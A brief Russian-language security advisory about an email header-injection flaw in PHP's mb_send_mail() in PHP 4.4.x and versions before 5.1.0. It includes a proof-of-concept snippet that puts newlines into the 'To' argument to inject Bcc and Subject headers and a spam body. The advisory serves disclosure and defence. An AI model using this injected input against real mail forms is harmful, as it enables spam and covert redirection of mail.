Программа: PHP 4.4.x, версии до 5.1.0
Уязвимость позволяет удаленному пользователю обойти ограничения безопасности.
Уязвимость существует в функции "mb_send_mail()". Удаленный пользователь,
контролирующий входные данные в параметр "To" уязвимой функции может внедрить в
письмо произвольные заголовки.
Пример:
<?php
$TO = "s.masugata@digicom.dnp.co.jp\nBcc:
s.masugata@digicom.dnp.co.jp\n".
"Subject: SPAM Subject\n\nSPAM SPAM SPAM SPAM Body";
mb_send_mail( $TO, "TEST Subject", "TEST Body" ); // NG!! mail send.
mail( $TO, "TEST Subject", "TEST Body" ); // OK!! mail not send.
?>
